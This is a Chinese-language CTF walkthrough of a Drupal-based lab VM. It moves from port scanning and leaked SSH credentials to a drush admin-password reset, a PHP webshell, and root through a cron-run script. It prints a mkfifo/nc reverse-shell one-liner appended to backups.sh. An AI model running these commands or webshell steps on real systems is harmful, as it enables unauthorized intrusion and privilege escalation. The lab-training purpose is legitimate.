扫描获取靶机ip
nmap扫描开放的端口服务
访问发现是一个drupal的cms
联想到DC-1也是这个cms,用msf试一下,但是失败了
看到首页上有一个作者名称,记得DC-1好像没有
搜一下试试
点开看是一些源码
打开config.php文件,有用户名还有密码
ssh登录
看到当前目录下有两个文件
查看mbox文件应该是一些邮件,邮件内容应该是计划任务执行这个脚本文件的结果
切换到这个目录下查看这个脚本文件,是一些需要执行的命令
尝试修改这个文件利用计划任务提权,但是当前用户不能修改
查看文件详细信息,文件所属组www-data用户才能修改文件
上面有个命令不认识,搜索一下是干什么用的
原来是用来管理drupal的命令,使用这个命令可以更改drupal用户的密码,然后可以登录后台拿shell,使用www-data用户提权
代码语言:javascript复制drush user-password admin --password="admin"
执行失败,切换到/var/www/html目录下执行成功
使用admin用户登录
来到content→add content→basic page准备写入php代码,发现不支持php
需要下载php插件,按照步骤下载安装
输入这个网址点击install https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
成功安装
写一个php文件
蚁剑连接
反弹shell
切换到交互式shell
切换到脚本文件目录修改文件
代码语言:javascript复制echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.101.80 5555 >/tmp/f" >> backups.sh写入反弹shell语句
等待计划任务执行把shell反弹过来
切换到root目录查看flag
